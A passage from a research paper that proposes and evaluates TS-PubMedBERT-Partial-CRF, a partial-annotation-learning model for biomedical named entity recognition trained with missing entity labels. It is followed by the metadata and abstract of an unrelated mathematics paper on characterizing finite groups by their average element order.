_et al._, 2020) and exploratory expert (Effland and Collins, 2021) approaches have been proposed, leading to partially annotated datasets with high precision but low recall for entity spans. Specifically, such datasets suffer from the unlabeled entity problem (Li _et al._, 2021), where large amounts of entity annotations are missing, as exemplified by the entity "SARS-CoV-2" in Fig. 1.
Directly assigning missing labels to the non-entity class (Qing) may degrade the performance of NER models. The unlabelled entity problem in NER has garnered attention, and prior work can be divided into two main directions. The first direction aims to design model architectures that alleviate the effects of false negatives in the training dataset, which are generated by labeling all missing labels as non-entities (Liang et al., 2020). This is accomplished through a model architecture that identifies false negatives and reduces their impact on model performance. The second direction involves Partial Annotation Learning (PAL), which treats the incompletely labeled dataset as a partially annotated dataset and directly models missing labels (Jie et al., 2019; Mayhew et al., 2019). In this approach, missing labels are treated as latent variables, as in the Partial Conditional Random Field (Partial CRF) model (Bellare and McCallum, 2007). All possible label paths are then deduced, and the marginal probabilities are calculated at the missing positions, with parameter estimation methods such as the Expectation Maximization algorithm, as in Tsuboi _et al._ (2008), utilized to maximize the log-likelihood and estimate model parameters. Partial annotation learning-based methods have been shown to alleviate the unlabelled entity problem effectively in previous studies. With only 1,000 biased and incomplete annotations (less than 10% of the original annotations for the datasets), a partial annotation learning model still achieves an F1 score of 71.7% on average (Effland and Collins, 2021). However, most studies have focused on evaluating the effectiveness of partial annotation learning on traditional NER benchmark datasets such as CoNLL2003 (Tjong Kim Sang and De Meulder, 2003), dealing with the most common named entity types like person, location, and organization. The effectiveness of partial annotation learning methods on the more challenging BioNER benchmark datasets has not been assessed. Furthermore, to the best of our knowledge, no single study exists which comprehensively evaluates the validity of partial annotation learning and provides an in-depth assessment of the impact of the missing entity ratio and annotation scenario on model performance. Although Effland and Collins (2021) compared traditional NER models to partial annotation learning models under several annotation budgets, these are limited to a few fixed numbers of entity annotations, namely 100 (0.4%), 500 (2.1%), 1K (4.3%), 5K (21.3%), and 10K (42.6%), making it hard to systematically appreciate the performance under degrading conditions. As we mentioned before, partial annotation learning is a promising approach that allows for the utilization of all possible label paths to train a model. Nevertheless, when a dataset contains abundant missing labels, this can lead to high computational costs. To this end, we propose a partial annotation learning-based model architecture for BioNER called TS-PubMedBERT-Partial-CRF, which leverages the advantages of partial annotation learning and uses confidence estimation to iteratively decrease the number of latent variables for parameter estimation in the Partial CRF model. The backbone model architecture is the Partial CRF model built on top of the biomedical pre-trained model PubMedBERT (Gu et al., 2021), which is integrated into a Teacher-Student self-training framework (Liang et al., 2020) with a confidence estimation module to improve the model's tolerance to noise.
Extensive experiments are conducted to evaluate the efficacy of our proposed model and verify the effectiveness of partial annotation learning models in alleviating the unlabeled entity problem for biomedical NER under various settings. Our proposed model is compared with the state-of-the-art biomedical NER tagger PubMedBERT (Gu et al., 2021), as well as two partial annotation learning models, BiLSTM-Partial-CRF (Jie et al., 2019) and EER-PubMedBERT (Effland and Collins, 2021), across 5 biomedical entity types. Our experimental results confirm that even a state-of-the-art full annotation learning model still suffers from the unlabelled entity problem when the number of missing entity annotations increases. Instead, partial annotation learning-based methods can effectively capture missing entity annotations in the dataset, achieving promising results even with 90% of entity annotations missing. Further, our model performs as well as the state-of-the-art partial annotation learning model from Effland and Collins (2021) across the studied missing entity ratios and annotation scenarios, and performs better under higher missing rates and a more realistic annotation scenario. ## 2 Related Work The Named Entity Recognition (NER) task is typically defined as a sequence labeling task in which tokens in a sequence are annotated using a tagging scheme such as BIO (Ramshaw and Marcus, 1995) or BILOU (Ratinov and Roth, 2009). A Conditional Random Field (CRF) model, which captures dependencies between labels, is frequently used as an NER tagger. However, traditional CRF models have limitations in directly modeling missing labels. Bellare and McCallum (2007) extended the conventional CRF and introduced the MC-CRF model to directly learn from incomplete annotations, which is the first application of the partial annotation learning method to the sequence labeling task. To deal with missing labels in an automatic metadata extraction task, they proposed a novel training objective for a CRF model that treated missing labels as latent variables, allowing for partial annotation learning by calculating marginal probabilities over all possible label paths. The Expectation Maximization algorithm (Dempster et al., 1977) was then utilized to maximize the log-likelihood, and the model parameters were estimated accordingly. Partial annotation learning has been applied to many NLP tasks, including part-of-speech tagging (Tsuboi et al., 2008), word segmentation (Yang and Vozila, 2014), and lexical disambiguation (Hovy and Hovy, 2012), to tackle the problem of incomplete annotation in the annotated corpus. In NER, partial annotation learning has been shown to significantly improve the performance of distantly supervised NER models, when compared to simply labeling all missing labels as non-entities to train a supervised NER model, or to using dictionaries to match entities (Gu et al., 2019; Carlson et al., 2009; Yang et al., 2018). While the effectiveness of partial annotation learning models was mainly evaluated on common entity types, few works applied partial annotation learning methods to domain-specific NER tasks. Jie et al. (2019) introduced a method to train a BiLSTM-Partial-CRF model with incomplete annotations, assigning high probability mass to the most probable labeling sequence that matches the available partial annotations.
They dropped 50% of the entity annotations in the CoNLL 2003 English dataset (Tjong Kim Sang and De Meulder, 2003) and the CoNLL 2002 Spanish NER dataset (Tjong Kim Sang, 2002) to simulate the incomplete annotation scenario and evaluate the models' performance. Even though Greenberg et al. (2018) constructed a partial annotation learning model for BioNER, and achieved promising performance with incomplete annotations compared to the traditional CRF model, they used the BiLSTM-Partial-CRF model architecture, which seems outdated by today's standards compared to models based on the Transformer architecture (Vaswani et al., 2017), specifically the pre-trained BERT model (Devlin et al., 2018).

Figure 1: Example illustrating the unlabelled entity problem in NER. The "Sequence" row shows the token sequence of the input text, the "Gold" row reflects the ground truth label path under the BILOU encoding scheme, and the "Partial" row shows the partially annotated label path, in which "—" represents an unknown label.

## 3 Materials and methods

In this section, we provide a technical explanation of the TS-PubMedBERT-Partial-CRF approach and discuss the competitor systems to compare against. Additionally, we outline the details of how to construct synthetic partially annotated datasets from the gold standard corpora using various entity annotation removal algorithms. ### Task Formulation In this work, we formulate the BioNER task as a sequence labeling task: given a sequence of tokens \(\mathbf{X}=[x_{1},...,x_{i},...,x_{n}]\), the goal is to predict a corresponding label sequence \(\mathbf{Y}=[y_{1},...,y_{i},...,y_{n}]\), s.t. \(y_{i}\in\mathcal{Y}\), that encodes the named entities, where \(\mathcal{Y}\) represents the label set and \(n\) is the length of the sequence. The fully annotated NER dataset with \(K\) samples can be regarded as a set of pairs of token sequence and label sequence: \[\mathbf{D}=\left\{\left(\mathbf{X}^{(k)},\mathbf{Y}^{(k)}\right)\right\}_{k=1}^{K} \tag{1}\] where \((\mathbf{X}^{(k)},\mathbf{Y}^{(k)})\) is the \(k\)-th instance from dataset \(\mathbf{D}\). For a partially annotated dataset suffering from the unlabeled entity problem, the label sequence is incomplete, with unknown labels. Instead of converting all missing labels in the partially annotated dataset to non-entity labels (Jie _et al._, 2019; Mayhew _et al._, 2019), we mark them as potential entities with a special "unknown" type. Given a token sequence \(\mathbf{X}\), the partial label sequence is a set of observed (label, position) pairs, defined as \(\mathbf{Y}_{p}\subset\left\{(y_{i},i)\mid y_{i}\in\mathcal{Y},1\leq i\leq n\right\}\), and we can define the collection of all possible completed sequences for \(\mathbf{X}\) that are compatible with \(\mathbf{Y}_{p}\), denoted as \(\mathbf{C}(\mathbf{Y}_{p})\). For example, in Fig. 1 there is only one observed label, at position \(1\), so the partial label sequence is \(\mathbf{Y}_{p}=\left\{(\text{U-Disease},1)\right\}\). For the \(6\) missing label positions, we can derive a possible label sequence collection \(\mathbf{C}(\mathbf{Y}_{p})\), whose size is \(|\mathcal{Y}|^{6}\).
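As a small illustration of how quickly \(\mathbf{C}(\mathbf{Y}_{p})\) grows, the following sketch enumerates all completions compatible with a partial label sequence; the label set used here is a toy BILOU-style subset chosen purely for illustration, not the full tag set of the corpora.

```python
from itertools import product

def compatible_completions(observed, n, label_set):
    """Enumerate C(Y_p): all full label sequences of length n that agree
    with the observed (label, position) pairs (1-indexed positions)."""
    fixed = {pos: lab for lab, pos in observed}
    choices = [[fixed[i]] if i in fixed else list(label_set) for i in range(1, n + 1)]
    for seq in product(*choices):
        yield seq

# Toy example mirroring Fig. 1: one observed label at position 1 and
# six unknown positions, so |C(Y_p)| = |label_set| ** 6.
label_set = ["O", "B-Disease", "I-Disease", "L-Disease", "U-Disease"]  # illustrative subset
observed = [("U-Disease", 1)]
completions = list(compatible_completions(observed, n=7, label_set=label_set))
print(len(completions))  # 5 ** 6 = 15625
```

Enumerating \(\mathbf{C}(\mathbf{Y}_{p})\) explicitly is only feasible for short sequences and small label sets; in practice the sum over compatible completions is computed implicitly by the dynamic-programming forward algorithm of the partial CRF, as described in the next subsection.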
Under this formulation, a partially annotated dataset will be given as: \[\mathbf{D}_{p}=\left\{\left(\mathbf{X}^{(k)},\mathbf{Y}_{p}^{(k)}\right)\right\}_{k=1}^{K} \tag{2}\] ### TS-PubMedBERT-Partial-CRF model architecture The TS-PubMedBERT-Partial-CRF model combines insights from the BOND-Coca model (Ding _et al._, 2022) and the EER-BERT model (Effland and Collins, 2021), combining a Teacher-Student self-training framework with partial annotation learning to alleviate computation costs. The backbone architecture of the TS-PubMedBERT-Partial-CRF model is PubMedBERT-Partial-CRF, where the pre-trained language model PubMedBERT plays the role of the encoder that generates the contextual language representation, and the partial CRF model captures the dependencies within the label sequence and models missing labels as latent variables. The PubMedBERT-Partial-CRF model is then integrated into a Teacher-Student self-training framework with the Coca strategy (Category-Oriented Confidence Calibration) (Ding _et al._, 2022) as a confidence estimation method to update the dataset with high-confidence labels, forming the architecture of the TS-PubMedBERT-Partial-CRF model.

Figure 2: TS-PubMedBERT-Partial-CRF Model Architecture

As illustrated in Fig. 2, training a TS-PubMedBERT-Partial-CRF model can be regarded as a two-step process, that is, initialization and Teacher-Student self-training. In the first step, to mitigate the effect of the unlabeled entity problem, we take full advantage of partial annotation learning to model the distribution of entity annotations based on all the possible label paths, avoiding being misled by the wrong signals of false negatives. Before self-training, we use the Coca strategy to automatically calculate class-wise confidence thresholds, taking into consideration the different confidence scales among label types. In the second step, to reduce the number of possible label paths in the partial CRF, we integrate the PubMedBERT-Partial-CRF model into the Teacher-Student self-training framework to iteratively estimate confidence scores and re-annotate data at each iteration. Specifically, for each given token sequence \(\boldsymbol{X}^{(k)}\), the partial CRF model will output a confidence score \(s^{(k)}\) for each predicted label sequence \(\boldsymbol{Y}^{(k)}\) and choose the label sequence with the highest confidence score as the final label sequence. To get the confidence score at each token position, we use the dynamic programming forward-backward algorithm, also known as the Baum-Welch algorithm (Baum _et al._, 1972), to calculate the marginal distribution and derive the token-level confidence score. Formally, for each given token sequence \(\boldsymbol{X}^{(k)}\), we use PubMedBERT to encode the sequence and take the hidden state of the last layer at each token position as the contextual language representation: \[h_{1:n}=\mathrm{BERT}\left(\boldsymbol{X}^{(k)};\theta_{\mathrm{BERT}}\right) \tag{3}\] Atop the contextual representation for each token, we use a linear layer to get an independent confidence score at each token position for each label, known as the emission score, noting that this score does not yet account for dependencies between consecutive labels: \[\phi\left(i,y_{i}\right)=\mathrm{Linear}\left(h_{i}\right) \tag{4}\] We sum the emission score and the transition score to get the log potentials, which can then be used to model the conditional probability of the CRF model.
\[\phi\left(i,y_{i},y_{i+1}\right)=\phi\left(i,y_{i}\right)+T_{y_{i},y_{i+1}} \tag{5}\] \[p(\boldsymbol{Y}^{(k)}|\boldsymbol{X}^{(k)};\theta)=\frac{\phi(\boldsymbol{Y}^{(k)})}{Z}=\frac{\exp\{\sum_{i=1}^{n-1}\phi\left(i,y_{i},y_{i+1}\right)+\phi\left(n,y_{n}\right)\}}{Z} \tag{6}\] \[\alpha,Z=\mathrm{Forward}\left(\phi\right) \tag{7}\] \[\beta,Z=\mathrm{Backward}\left(\phi\right) \tag{8}\] where \(Z\) denotes the partition function, \(\mathrm{Forward}(\cdot)\) and \(\mathrm{Backward}(\cdot)\) denote the forward and backward algorithms respectively, and \(\alpha\) and \(\beta\) denote the variables of the forward and backward algorithms respectively. Finally, we can get the confidence score for the label prediction at each token position by calculating the marginal probabilities: \[\kappa_{i}=p(y_{i}|\boldsymbol{X}^{(k)})=\frac{\alpha_{i}\beta_{i}}{Z} \tag{9}\] where \(\kappa_{i}\) denotes the confidence score for the model to predict \(y_{i}\) at the \(i\)-th position, and \(\alpha_{i}\) and \(\beta_{i}\) denote the forward and backward probabilities at the \(i\)-th position correspondingly; note that \(\kappa_{i}\) takes the dependencies between consecutive labels into account. Commonly, neural network-based models are trained in a supervised learning paradigm using batch-wise learning to compute the gradients of the loss function with respect to each parameter of the model. In the training process, we maximize the marginal likelihood of the observed tags (Tsuboi _et al._, 2008), and approximate the gradients with Monte-Carlo estimates from mini-batches (Robbins and Monro, 1951); see Equation (10). In each batch, the algorithm computes the gradients for a subset of the training data, rather than the entire dataset, in order to reduce the computational cost of the optimization. By iteratively updating the parameters in this way, the algorithm aims to find the optimal set of parameters that minimize the loss function and enable the model to make accurate predictions. \[L_{\mathrm{PAL}}\left(\theta;\boldsymbol{D}_{p}\right)=-\sum_{k}\log\sum_{y\in\mathbf{C}\left(\mathbf{Y}_{p}^{(k)}\right)}p\left(y\middle|\boldsymbol{X}^{(k)};\theta\right) \tag{10}\] In addition, the expected entity ratio is shown to be a crucial piece of prior knowledge for guiding the model to simulate the real distribution from incomplete annotations. Effland and Collins (2021) assumed that named entity tags (e.g., Drug) over the entire distribution of sentences occur at relatively stable rates for different named entity datasets with the same task specification. So they proposed using the Expected Entity Ratio (EER) loss in conjunction with the Partial Annotation Learning (PAL) loss to conduct multi-task learning. Specifically, if there are \(N\) entity annotations in total for the partially annotated dataset, the entity ratio under complete annotation is expected to be \(\mu\). During neural network training, their practice is to sample \(B\) instances from the \(N\) population and to encourage the tag marginals of being part of an entity, \(p_{\theta}(y_{i}\neq\text{O})\), in each sampled batch under the model to match the given EER, up to a margin of uncertainty \(\gamma\). While the entity distribution in NER datasets is highly skewed, with a large proportion of "O" labels denoting non-entities, the overall entity distribution across the entire dataset may differ from that of individual batches.
We speculate that solely relying on the entity ratio within a batch may lead to high variance and thus limited generalisation performance. As a result, we propose the Overall Expected Entity Ratio (OER) loss to tackle this problem by adding to the EER loss an additional constraint that encourages the marginal probability of being part of an entity, \(p_{\theta}(y_{i}\neq\text{O})\), computed over the entire dataset rather than within a single batch, to match the expected entity ratio. The final loss, presented in Equation (13), combines Equation (10), Equation (11), and Equation (12), noting that the \(L_{\rm ST}\) term is zero before self-training. ### 3.3 Competitor systems In this study, we compare the TS-PubMedBERT-Partial-CRF model to two types of competitors to explore the effectiveness of our proposed model for the BioNER task: full annotation learning-based systems and partial annotation learning-based NER systems. For the full annotation learning-based system, we experiment with PubMedBERT (abstracts + full text) (Gu et al., 2021), which is the state-of-the-art pre-trained language model in the biomedical domain. PubMedBERT was pre-trained from scratch using the abstracts and full-text articles from PubMed Central, and has been shown to outperform BERT (Devlin et al., 2018), RoBERTa (Liu et al., 2019), BioBERT (Lee et al., 2019), SciBERT (Beltagy et al., 2019), etc. on NER tasks in the biomedical domain. The PubMedBERT NER tagger takes the final hidden representation of PubMedBERT for each token and inputs it into a classification layer to categorize the tokens into the different NER labels. For partial annotation learning-based systems, we implement two models from prior work.
One of them is the BiLSTM-Partial-CRF model, proposed by Jie et al. (2019), which is a commonly used baseline model for partial annotation learning. This model is based on a BiLSTM-Partial-CRF followed by a self-training framework with cross-validation. The architecture combines a recurrent neural network with Long Short-Term Memory (LSTM) (Hochreiter and Schmidhuber, 1997), for learning correlations of features of the input text, with a partial CRF for predicting the label sequence. The loss function during training is marginalized over the labels in the missing positions to consider all potential labels. The model trained on all but one fold is used to update the labeling distributions of the held-out fold, and this process continues until convergence. Another model is the EER-BERT model, proposed by Effland and Collins (2021), which is the state-of-the-art partial annotation learning model, exceeding the results from Li et al. (2021) on 7 datasets. They integrated the Expected Entity Ratio loss, based on the assumption that named entity tags over the entire distribution of sentences occur at a relatively stable proportion. We note that we chose the state-of-the-art biomedical language model PubMedBERT as the backbone model for all the pre-trained language model-based competitor systems. For example, we adapted the EER-BERT model to the EER-PubMedBERT model by converting the original RoBERTa to PubMedBERT, to make the comparison as fair as possible. ### 3.4 Corpora compilation and pre-processing Training deep architectures usually requires large amounts of annotated gold standard data, posing a problem for applications in the biomedical domain, where corpora sometimes contain fewer than 500 sentences. They also vary in dataset size, entity distribution, genre (e.g. patents vs. scientific articles), and text type (e.g. abstract vs. full text). In order to obtain solid evaluation results, we compile the small gold standard data sets into a large collection of biomedical NER datasets following HunFlair (Weber et al., 2021). Specifically, we take into consideration the influence of corpus size and other implicit factors, such as the distribution of entity mentions and sentence length, and perform our evaluations for five entity types: genes/proteins, chemicals, diseases, cell lines, and species. Weber et al. successively proposed HUNER (Weber et al., 2020) and HunFlair (Weber et al., 2021), biomedical entity recognition taggers covering the above-mentioned entity types. Following their work, we integrate 15 gold-standard biomedical NER corpora in a consistent format as the fully annotated datasets for our experiments, excluding eight corpora1 that we don't have access to, and the BioSemantics corpus, which contains a large number of very long sentences. Footnote 1: Arizona Disease, BioInfer, CLL, GELLUS, IEPA, LINNAEUS, Osiris v1.2, Variome. Analogously to the data preprocessing pipeline of HUNER, for each entity type we aggregate the corresponding corpora which contain annotations for the respective entity type to learn a type-specific model, and convert them into the standard CoNLL2003 format. In addition, we re-use the train/dev/test splits introduced by HUNER to split each resulting corpus for each entity type with a ratio of 60:10:30 among the splits.
Subsequently, we convert the BIO encoding scheme of the standard CoNLL2003 format into the BILOU (beginning, inside, last, outside, unit) encoding scheme, which has been observed to outperform the widely adopted BIO encoding scheme for NER. We note that splitting is carried out in a deterministic way and there is no overlap among the splits across corpora for the same entity type, to avoid knowledge leakage. Table 1 highlights important statistics of the corpora for the five entity types. As we can see, the distribution of corpora varies among the different entity types. Take the training corpora as an example. The corpus size varies between 12,592 sentences for cell lines and 99,007 sentences for chemicals. The number of entity annotations varies between 2,500 for cell lines and 114,575 for chemicals. The number of surface forms varies between 1,419 for cell lines and 29,908 for chemicals. The distribution of the number of tokens in sentences among the training corpora for the entity types can be found in the supplementary materials (Supplementary Fig. S1). ### 3.5 Partial annotation scenarios simulation In this research, one of our goals is to explore the capability of partial annotation learning models to effectively mitigate the unlabeled entity problem (Li et al., 2021). We assume that partial annotations for the NER task can be obtained by removing entity annotations from the fully annotated dataset, and we consider entity removal schemes that simulate the unlabeled entity problem in real-world situations. Note that we only remove entity annotations in the train set and keep the gold truth dev set and test set to acquire accurate evaluation results. The first scheme is "Remove Annotations Randomly" (RAR), previously used by Jie et al. (2019) and Li et al. (2021), which drops entity annotations uniformly at random. By setting the entity removal rate \(r\) we control the number of removed entity annotations. For example, \(r=0.1\) means that we remove 10% of all entity annotations randomly in the dataset and keep 90% of entity annotations. The drawback of this scheme is that the entity removal process is incomplete, with a diverse set of surface forms of the removed entity annotations still occurring in the dataset, which is not realistic under certain circumstances (Effland and Collins, 2021). The second scheme is "Remove All Annotations for Randomly Selected Surface Forms" (RSFR), which is used by Mayhew _et al._ (2019) and is a more realistic yet more challenging scheme to learn from. The RSFR scheme can be regarded as a simulation of distantly supervised NER, wherein entity mentions not occurring in the dictionary will consistently not be annotated in the whole dataset. To simulate data for this scenario, we group annotations by their surface forms and randomly select groups of annotations to remove, as the literal meaning of this scheme suggests. To allow for a fair comparison with the RAR scheme, we downsample annotations grouped by surface forms until the number of removed entity annotations is roughly the same under both schemes at the same entity removal rate. Fig. 3 provides a schematic comparison of these two schemes as an illustration. The pseudo-code for the RAR and RSFR algorithms, and the change in the number of annotations in the dataset along the entity removal rate, can be found in the supplementary materials (Section B).
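For concreteness, here is a minimal sketch of the two removal schemes described above. It is an illustration under stated assumptions, not the authors' released implementation or supplementary pseudo-code: annotations are assumed to be dictionaries with a `surface_form` key, and the function names are our own.

```python
import random
from collections import defaultdict

def remove_annotations_randomly(annotations, removal_rate, seed=0):
    """RAR: drop entity annotations uniformly at random at rate `removal_rate`."""
    rng = random.Random(seed)
    n_remove = int(round(removal_rate * len(annotations)))
    removed = set(rng.sample(range(len(annotations)), n_remove))
    return [a for i, a in enumerate(annotations) if i not in removed]

def remove_selected_surface_forms(annotations, removal_rate, seed=0):
    """RSFR: remove *all* annotations of randomly selected surface forms until
    roughly the same number of annotations is removed as under RAR."""
    rng = random.Random(seed)
    groups = defaultdict(list)
    for ann in annotations:
        groups[ann["surface_form"]].append(ann)
    target = int(round(removal_rate * len(annotations)))
    forms = list(groups)
    rng.shuffle(forms)
    removed_forms, removed_count = set(), 0
    for form in forms:
        if removed_count >= target:
            break
        removed_forms.add(form)
        removed_count += len(groups[form])
    return [a for a in annotations if a["surface_form"] not in removed_forms]

# Usage sketch: each annotation is a dict such as
# {"sentence_id": 3, "start": 5, "end": 7, "surface_form": "SARS-CoV-2", "type": "Species"}.
```

The key behavioural difference mirrors the text: under RAR other mentions sharing a removed mention's surface form can stay annotated, whereas under RSFR every mention of a selected surface form disappears, mimicking a dictionary with missing entries.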
## 4 Experiments

To verify the adaptiveness of our proposed method, we conduct experiments based on the combination of three settings: entity type, entity removal rate, and entity removal scheme, detailed below.

### Experimental design

For each entity type, we generated synthetic datasets from the original fully annotated dataset by randomly removing entity annotations based on the combination of entity removal rate and entity removal scheme. The entity removal rate was set to 0.1, 0.2, ..., 0.9. For each combination, we removed entity annotations from the original dataset with five different random seeds to account for the variance in model performance over different runs. In this way, 9 (entity removal rates) x 2 (entity removal schemes) x 5 (random seeds) x 5 (entity types) x 4 (models) = 1,800 experiments were conducted. Furthermore, for each entity type, we applied a PubMedBERT tagger to the original fully annotated dataset to provide an upper bound on model performance, which we did not expect any of the other methods to outperform. In our work, we use the entity-level precision, recall and F1-score as the evaluation metrics, which means that model performance is measured by the ability to correctly identify the boundaries of entities and classify them into their categories. The detailed experimental settings can be found in the supplementary materials (Supplementary Section B).

### Overall Results

Fig. 4 displays the comprehensive results of our empirical investigations, wherein the results are aggregated across five entity types and averaged over five independent random seeds. We have utilized a 95% confidence interval to ensure the robustness of our findings. In order to classify the results obtained, a removal rate of 0.5 is employed as a cut-off, resulting in two distinct groups: a low removal rate group (0.1-0.5) and a high removal rate group (0.6-0.9). Model performance is then evaluated for both of these groups under the two entity removal schemes, as shown in Table 2. Additionally, to provide detailed insights into the model's performance on each entity type, we have also recorded the corresponding F1-score, precision, and recall (Supplementary Fig. S3, Fig. S4, Fig. S5). We provide the full experimental results in Supplementary Table S1. Based on these results, we can make the following observations.

Secondly, our approach is effective in eliminating the misguidance brought by unlabeled entities, surpassing the prior state-of-the-art full annotation learning PubMedBERT tagger under both entity removal schemes. As we can see from Table 2, our model significantly outperforms the PubMedBERT tagger, especially at high removal rates. Under the RAR scheme, our model achieves a 72.46% F1 score for the high removal rate group, outperforming the PubMedBERT tagger by 93.41%. Taking the results for one entity type as an example, on the Chemicals dataset and under the RAR scheme, our F1 score exceeds that of the PubMedBERT tagger by 8.34% when the removal rate is 0.5, 48.51% when the removal rate is 0.7, and 75.23% when the removal rate is 0.9. On the Species dataset, our model can achieve an F1 score of 65.53% under the RAR scheme and 50.88% under the RSFR scheme with only nearly 800 entity annotations (entity removal rate equal to 0.99), whereas the PubMedBERT tagger cannot acquire enough information to train the model, obtaining F1 scores of 9.46% and 15.09%, respectively.
Thirdly, compared with the commonly used partial annotation learning model BiLSTM-Partial-CRF, our model exhibits a widening gap in F1 score as the entity removal ratio increases. Taking the Disease dataset as an example, under the RAR scheme, the F1 score gap between our model and the BiLSTM-Partial-CRF model is 8.48% when the entity removal rate is 0.7 and 64.82% when the entity removal rate is 0.9. This suggests that adopting a pretrained language model as the encoder of a partial annotation learning model might play an essential role in mitigating the unlabeled entity problem under high entity missing rates.

Figure 4: The overall Precision, Recall, and F1-score on the test set aggregated over all entity types. The figure contains six subplots arranged in three rows and two columns, where each column groups the results for the corresponding entity removal scheme. In each subplot, the horizontal axis denotes the entity removal rate, and the vertical axis denotes the underlying evaluation metric.

Further, as we can see from Supplementary Fig. S3, our model performs on par with the state-of-the-art partial annotation learning model EER_PubMedBERT on average, while achieving overall better results under the RSFR scheme except on the Cell Lines dataset. There are modest improvements compared to the EER_PubMedBERT model under the RSFR scheme, especially at high missing entity ratios. For example, on the Disease dataset, our model outperforms EER_PubMedBERT by 16.52% when the entity removal rate is equal to 0.9.

Fourthly, the RSFR entity removal scheme, which is more realistic, is also more challenging compared to the RAR scheme. For the RAR scheme, the partial annotation learning models can mitigate the unlabeled entity problem well when the entity removal rate is small, while under the RSFR scheme model performance starts to decline already at the initial stage of removing entity annotations. Fig. 4 demonstrates a stronger relationship between the removal rate and the F1 score for the RSFR scheme, which shows a steeper slope compared with the RAR scheme, indicating that even a small ratio of missing entity annotations increases the difficulty of model learning. On the Disease dataset at entity removal rate 0.9, our model acquires an F1 score of 80.32% under the RAR scheme, which is close to the upper bound of 85.17%, but only 71.71% under the RSFR scheme. In addition, Mayhew et al. (2019) proposed adding false positive labels as noise to explore the effectiveness of partial annotation learning models under this scenario, which is also valuable to explore. We leave this investigation to future work.

Finally, as we can see from Fig. 4, the F1 score curve of each subplot is roughly similar in shape to that of the recall, and the precision remains relatively high even for the full annotation learning model under high removal rates, suggesting that model performance is mostly determined by the recall. The advantage of partial annotation learning models is that, even with a large number of missing entity annotations, they can circumvent possibly unlabeled entities and achieve high recall with only a small sacrifice in precision compared to the full annotation learning model.

## 5 Discussion

### Effects of partial annotation learning

It is instructive to compare partial and full annotation learning models. For all five entity types we evaluate, partial annotation learning methods on average achieve better F1 scores than the full annotation learning model as the removal rate gets higher.
The full annotation learning model can achieve good results when there are few missing entity annotations, while as the number of missing entity annotations increases, the advantage of partial annotation learning models begins to emerge. As we can see from Table 2, the PubMedBERT tagger consistently achieves the best precision regardless of entity removal rate and entity removal scheme. However, its recall drops sharply as the removal rate goes from low to high, declining from 70.26% to 19.55% under the RAR scheme and from 57.46% to 20.51% under the RSFR scheme. The BiLSTM-Partial-CRF model, a partial annotation learning model that benefits from neither pretraining knowledge nor the Transformer architecture, starts to show its effectiveness under high removal rates. The BiLSTM-Partial-CRF model achieves a similar F1 score to the PubMedBERT tagger under low removal rates, but outperforms it by 13.64% for high removal rates under the RAR scheme. As we can see from Fig. 4, the performance of the BiLSTM-Partial-CRF model exceeds that of PubMedBERT when the entity removal rate increases to nearly 0.4. For our model and the EER_PubMedBERT model, the effectiveness of partial annotation learning starts to show even at low removal rates, especially under the RSFR scheme. Our model improves over the PubMedBERT tagger by 5.97% under the RSFR scheme for the low removal rate group, verifying the effectiveness of partial annotation learning. As we can see, there is still a gap between the state-of-the-art (SOTA) fully annotated learning methods and the partial annotation learning models under low missing rates. Although significant progress has been made by partial annotation learning methods, they sacrifice precision to achieve proportionally higher recall. This indicates that it could be a promising option to construct a NER pipeline to achieve better overall model performance in practical applications, by using partial annotation learning to recall entity annotations first and then using a full annotation learning model to further improve precision.

### Effects of entity distribution among datasets

As we can see from Table 1, the entity distribution varies among datasets, which affects the models' sensitivity to fluctuations in the partially annotated training data. The Cell Lines and Species datasets have relatively sparse entity distributions, with a small number of training instances and fewer entity annotations. As illustrated in Supplementary Fig. S3, Fig. S4, and Fig. S5, we find that the precision scores of our model on these two datasets are severely lower than the upper bound, while the recall scores are notably above the upper bound overall. After balancing between precision and recall, the F1 scores on these two datasets are relatively stable across different removal rates regardless of the entity removal scheme. In contrast, the slopes of our model's F1 score curves on the other three datasets under the RSFR scheme are apparently steeper, suggesting that on entity-dense datasets our model is more sensitive to the increase of missing entities under the RSFR scheme. This demonstrates that it is important to consider the precision/recall trade-off for partial annotation learning models. Furthermore, partial annotation learning models are sensitive to entity-sparse datasets, which we can see from the confidence interval range.
The confidence interval range is relatively larger on the Cell Lines and Species datasets compared to the other three datasets, regardless of the entity removal scheme used.

## 6 Conclusion

In this work, we present the TS-PubMedBERT-Partial-CRF architecture, a NER model based on partial annotation learning designed for dealing with the unlabeled entity problem in NER, and explore its effectiveness for biomedical NER. Considering missing entity ratios and different annotation scenarios, we designed a set of empirical experiments on five biomedical entity types, including Cell Lines, Diseases, Genes, Chemicals and Species, and compared three partial annotation learning methods (TS-PubMedBERT-Partial-CRF, BiLSTM-Partial-CRF, EER_PubMedBERT) against the state-of-the-art full annotation learning PubMedBERT tagger. Our results strongly confirm the feasibility and robustness of partial annotation learning, which shows a strong capacity to learn from partially annotated corpora even under extreme conditions. A limitation of our work is that we do not conduct ablation experiments to verify the effectiveness of each separate modification, e.g., the self-training loss, which we intend to explore in future work. This study aims to provide insights into the best practices for partial annotation learning in biomedical information extraction and to help practitioners make informed decisions when dealing with partially annotated data in real-world applications.

## Acknowledgements

We acknowledge the support of Tian-Yuan Huang for drawing the figures.

## Funding

This work is supported by the China Scholarship Council (CSC).
2307.15328
Characterizing some finite groups by the average order
The average order of a finite group G is denoted by o(G). In this note, we classify groups whose average orders are less than o(S4), where S4 is the symmetric group on four elements. Moreover, we prove that G \cong S4 if and only if o(G) = o(S4). As a consequence of our results we give a characterization of some finite groups by the average order. In [9, Theorem 1.2], the groups whose average orders are less than o(A4) are classified. It is worth mentioning that, to obtain our results, we avoid using the main theorems of [9], and our results lead to a reproof of those theorems.
Ashkan Zarezadeh, Behrooz Khosravi, Zeinab Akhlaghi
2023-07-28T06:06:57Z
http://arxiv.org/abs/2307.15328v1
# Characterizing some finite groups by the average order

###### Abstract.

The average order of a finite group \(G\) is denoted by \(\mathrm{o}(G)\). In this note, we classify groups whose average orders are less than \(\mathrm{o}(S_{4})\), where \(S_{4}\) is the symmetric group on four elements. Moreover, we prove that \(G\cong S_{4}\) if and only if \(\mathrm{o}(G)=\mathrm{o}(S_{4})\). As a consequence of our results we give a characterization of some finite groups by the average order. In [9, Theorem 1.2], the groups whose average orders are less than \(\mathrm{o}(A_{4})\) are classified. It is worth mentioning that, to obtain our results, we avoid using the main theorems of [9], and our results lead to a reproof of those theorems.

Key words and phrases: Element order, sum of element orders, average order, characterization

2000 Mathematics Subject Classification: 05C25, 05C69, 94B25

The first author is supported by a grant from IPM (No. 1402200112)

## 1. Introduction

